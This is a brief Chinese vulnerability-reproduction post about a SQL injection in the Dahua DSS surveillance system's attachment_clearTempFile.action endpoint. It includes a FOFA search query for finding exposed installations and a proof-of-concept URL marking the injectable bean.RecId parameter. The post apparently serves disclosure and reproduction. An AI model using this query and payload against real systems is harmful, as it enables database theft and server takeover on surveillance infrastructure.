大华 DSS 数字监控系统attachment_clearTempFile.action存在SQL注入漏洞

漏洞描述

大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞，利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

资产测绘

FOFA：body="<meta http-equiv="refresh" content="1;url='/admin'"></span>" || body="dahuaDefined/headCommon.js" || title=="DSS"

漏洞复现

http://ip/portal/attachment_clearTempFile.action?bean.RecId=1*&bean.TabName=1

原文始发于微信公众号（漏洞文库）：【漏洞复现】大华 DSS 数字监控系统attachment_clearTempFile.action存在SQL注入漏洞